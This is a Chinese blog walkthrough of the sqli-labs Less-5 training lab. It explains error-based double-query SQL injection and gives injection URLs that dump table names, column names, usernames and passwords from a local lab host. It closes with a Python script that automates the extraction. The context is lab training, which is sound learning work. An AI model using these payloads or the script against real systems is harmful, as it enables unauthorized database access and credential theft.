当前位置: 开发笔记 > 编程语言 > 正文

sqlilabs系列——第五关（二次查询注入）

作者：mobiledu2502929697 | 来源：互联网 | 2023-07-13 18:03

文章目录

- - 判断注入
  - 什么是二次查询注入
  - - - rand()函数
      - floor()函数
      - concat()函数
      - group by语句
      - count()函数
  - 开始注入
  - exp

判断注入

一开始我以为这是一个常规的sql盲注，操作之后发现事情并没有那么简单，为了方便学习，我直接把sql语句输出出来了：
在这里插入图片描述
然后就去看题目名称，Double Injection（双查询注入），就明白怎么回事了。

什么是二次查询注入

双查询注入其实就是一个select语句中再嵌套一个select语句，嵌套的这个语句称作子查询，例如：

select concat((select database()));

在这里插入图片描述

这里我解释一下，这条sql语句先执行select database()，然后在执行外边的concat()函数来输出结果，后续注入，需要先了解count()、rand()、floor()、concat()这三个函数的功能以及group by语句的用法。

count()：汇总数据函数
rand()：随机输出一个小于1的正数
floor()：把输出的结果取整
group by语句：把结果分组输出
concat()：连接两条语句

rand()函数

先来看这个函数的作用：

select rand();

在这里插入图片描述

就是随机输出一个小于1的正数

floor()函数

现在加上floor()函数，效果就不一样了，floor是取整函数，为了体现的更直观，我们把rand()*2来输出，也就是输出0或1.

select floor(rand()*2);

在这里插入图片描述

concat()函数

现在我们再加上一个concat()函数，看看效果：

select concat((select database()),floor(rand()*2));

在这里插入图片描述

两条语句的结果是不是连接起来了，这就是concat()函数的作用。

group by语句

group by就是分组语句，举个例子大家就明白了

select concat((select database()),floor(rand()*2))as a from information_schema.tables group by a;

在这里插入图片描述
这里解释一下，把select database()和floor(rand()*2)的结果输出到a里，然后最大长度根据information_schema.tables来决定，然后用a进行分组，bees1一组，bees0一组:

这里的database()你也可以换成version()、user():

count()函数

最后在语句中加个count(*)，整合一下结果，就明白count()函数是干嘛的了：
在这里插入图片描述

现在才是真正展现二次查询注入威力的时候，当我们第二次去查询的时候，数据库竟然报错了：
在这里插入图片描述
这就说明，如果想要页面爆出你想要的数据来，点击一次是没用的，只有点第二次数据库才会报错，才会回显。

开始注入

http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by a%23

这是第一次查数据库，页面没啥反应
在这里插入图片描述
第二次点击：

爆表名时又遇到了新问题：

http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='security'),floor(rand()*2))as a from information_schema.tables group by a%23

在这里插入图片描述

这里多了一个键，键1已经存在虚拟表中，由于键只能唯一，所以此时就会报错。所以在使用floor()、rand(0)、count()、group by时，数据表中至少要有3条记录才会报错，所以我们在第二条select语句末尾加上limit x,1即可让它报错继续注入。

第一张表：

http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='security'limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23

在这里插入图片描述
第二张表：

http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='security'limit 1,1),floor(rand()*2))as a from information_schema.tables group by a%23

在这里插入图片描述
第三张表：

http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='security'limit 2,1),floor(rand()*2))as a from information_schema.tables group by a%23

在这里插入图片描述
第四张表：

http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='security'limit 3,1),floor(rand()*2))as a from information_schema.tables group by a%23

终于出现了！
在这里插入图片描述
爆列名：

列一：

http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select column_name from information_schema.columns where table_name='users'limit 12,1),floor(rand()*2))as a from information_schema.tables group by a%23

在这里插入图片描述
列二：

http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select column_name from information_schema.columns where table_name='users'limit 13,1),floor(rand()*2))as a from information_schema.tables group by a%23

在这里插入图片描述

爆字段：

字段一：

http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select username from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23

在这里插入图片描述
字段二：

http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select password from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23

在这里插入图片描述

注：在爆的时候有可能需要点击两次及以上，毕竟它有个缓冲时间，多查几次就出来了。

exp

网上大牛写的exp脚本，非常值得学习啊！

import requests from bs4 import BeautifulSoup db_name = '' table_list = [] column_list = [] url = '''http://192.168.1.113:86/Less-5/?id=1''' ### 获取当前数据库名 ### print('当前数据库名:') payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select database()),0x3a,floor(rand(0)*2)))--+''' r = requests.get(url+payload) db_name = r.text.split(':')[-2] print('[+]' + db_name) ### 获取表名 ### print('数据库%s下的表名:' % db_name) for i in range(50): payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select table_name from information_schema.tables where table_schema='%s' limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (db_name,i) r = requests.get(url+payload) if 'group_key' not in r.text: break table_name = r.text.split(':')[-2] table_list.append(table_name) print('[+]' + table_name) ### 获取列名 ### #### 这里以users表为例 #### print('%s表下的列名:' % table_list[-1]) for i in range(50): payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select column_name from information_schema.columns where table_name='%s' limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (table_list[-1],i) r = requests.get(url + payload) if 'group_key' not in r.text: break column_name = r.text.split(':')[-2] column_list.append(column_name) print('[+]' + column_name) ### 获取字段值 ### #### 这里以username列为例 #### print('%s列下的字段值:' % column_list[-2]) for i in range(50): payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select %s from %s.%s limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (column_list[-2],db_name,table_list[-1],i) r = requests.get(url + payload) if 'group_key' not in r.text: break dump = r.text.split(':')[-2] print('[+]' + dump)

运行效果：
在这里插入图片描述

推荐阅读

int
SQL日志收缩及截断方法详解

本文详细介绍了SQL日志收缩的方法，包括截断日志和删除不需要的旧日志记录。通过备份日志和使用DBCC SHRINKFILE命令可以实现日志的收缩。同时，还介绍了截断日志的原理和注意事项，包括不能截断事务日志的活动部分和MinLSN的确定方法。通过本文的方法，可以有效减小逻辑日志的大小，提高数据库的性能。 ... [详细]

蜡笔小新 2023-12-14 18:23:25
string
C#学习教程：在Console中工作但在Windows窗体中不工作的异步代码分享

本文分享了一个关于在C#中使用异步代码的问题，作者在控制台中运行时代码正常工作，但在Windows窗体中却无法正常工作。作者尝试搜索局域网上的主机，但在窗体中计数器没有减少。文章提供了相关的代码和解决思路。 ... [详细]

蜡笔小新 2023-12-14 15:56:00
string
Oracle中tnsnames.ora的作用和配置方法

本文介绍了Oracle数据库中tnsnames.ora文件的作用和配置方法。tnsnames.ora文件在数据库启动过程中会被读取，用于解析LOCAL_LISTENER，并且与侦听无关。文章还提供了配置LOCAL_LISTENER和1522端口的示例，并展示了listener.ora文件的内容。 ... [详细]

蜡笔小新 2023-12-14 07:44:06
int
Oracle分析函数first_value()和last_value()的用法及原理

本文介绍了Oracle分析函数first_value()和last_value()的用法和原理，以及在查询销售记录日期和部门中的应用。通过示例和解释，详细说明了first_value()和last_value()的功能和不同之处。同时，对于last_value()的结果出现不一样的情况进行了解释，并提供了理解last_value()默认统计范围的方法。该文对于使用Oracle分析函数的开发人员和数据库管理员具有参考价值。 ... [详细]

蜡笔小新 2023-12-13 19:07:23
string
SpringJdbcTemplate的使用详解

本文详细介绍了Spring的JdbcTemplate的使用方法，包括执行存储过程、存储函数的call()方法，执行任何SQL语句的execute()方法，单个更新和批量更新的update()和batchUpdate()方法，以及单查和列表查询的query()和queryForXXX()方法。提供了经过测试的API供使用。 ... [详细]

蜡笔小新 2023-12-13 14:27:11
int
高质量SQL书写的30条建议

本文提供了30条关于优化SQL的建议，包括避免使用select *，使用具体字段，以及使用limit 1等。这些建议是基于实际开发经验总结出来的，旨在帮助读者优化SQL查询。 ... [详细]

蜡笔小新 2023-12-13 13:24:33
int
如何在php中将mysql查询结果赋值给变量

本文介绍了在php中将mysql查询结果赋值给变量的方法，包括从mysql表中查询count(学号)并赋值给一个变量，以及如何将sql中查询单条结果赋值给php页面的一个变量。同时还讨论了php调用mysql查询结果到变量的方法，并提供了示例代码。 ... [详细]

蜡笔小新 2023-12-12 18:22:57
io
MySQL显示SQL语句执行时间的实例详解

本文详细介绍了如何使用MySQL来显示SQL语句的执行时间，并通过MySQL Query Profiler获取CPU和内存使用量以及系统锁和表锁的时间。同时介绍了效能分析的三种方法：瓶颈分析、工作负载分析和基于比率的分析。 ... [详细]

蜡笔小新 2023-12-12 16:16:42
int
使用sp_msforeachdb发生错误时如何捕获数据库名称？

本文讨论了在使用sp_msforeachdb执行动态SQL命令时，当发生错误时如何捕获数据库名称。提供了两种解决方案，并介绍了如何正确使用'?'来显示数据库名称。 ... [详细]

蜡笔小新 2023-12-12 15:20:14
int
使用pymysql的Python无法向mysql数据库中的表添加字段

WhenIusepythontoapplythepymysqlmoduletoaddafieldtoatableinthemysqldatabase,itdo ... [详细]

蜡笔小新 2023-12-12 13:45:10
int
PDO MySQL

PDOMySQL如果文章有成千上万篇，该怎样保存？数据保存有多种方式，比如单机文件、单机数据库（SQLite）、网络数据库（MySQL、MariaDB）等等。根据项目来选择，做We ... [详细]

蜡笔小新 2023-12-12 10:25:39
string
Redis数据结构之string应用场景解析

本文介绍了Redis的基础数据结构string的应用场景，并以面试的形式进行问答讲解，帮助读者更好地理解和应用Redis。同时，描述了一位面试者的心理状态和面试官的行为。 ... [详细]

蜡笔小新 2023-12-14 14:02:42
int
PHP实现断点续传乱序合并文件的方法和源码

本文介绍了使用PHP实现断点续传乱序合并文件的方法和源码。由于网络原因，文件需要分割成多个部分发送，因此无法按顺序接收。文章中提供了merge2.php的源码，通过使用shuffle函数打乱文件读取顺序，实现了乱序合并文件的功能。同时，还介绍了filesize、glob、unlink、fopen等相关函数的使用。阅读本文可以了解如何使用PHP实现断点续传乱序合并文件的具体步骤。 ... [详细]

蜡笔小新 2023-12-14 04:33:19
io
解决VS写C#项目导入MySQL数据源报错“You have a usable connection already”问题的正确方法

本文介绍了在VS写C#项目导入MySQL数据源时出现报错“You have a usable connection already”的问题，并给出了正确的解决方法。详细描述了问题的出现情况和报错信息，并提供了解决该问题的步骤和注意事项。 ... [详细]

蜡笔小新 2023-12-13 16:31:57
io
修复安装win10失败并提示“磁盘布局不受UEFI固件支持”的方法

本文介绍了修复安装win10失败并提示“磁盘布局不受UEFI固件支持”的方法。首先解释了UEFI的概念和作用，然后提供了两种解决方法。第一种方法是在bios界面中将Boot Mode设置为Legacy Support，Boot Priority设置为Legacy First，并关闭UEFI。第二种方法是使用U盘启动盘进入PE系统，运行磁盘分区工具DiskGenius，将硬盘的分区表设置为gpt格式，并留出288MB的内存。最后，通过运行界面输入命令cmd来完成设置。 ... [详细]

蜡笔小新 2023-12-11 18:42:50

mobiledu2502929697

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章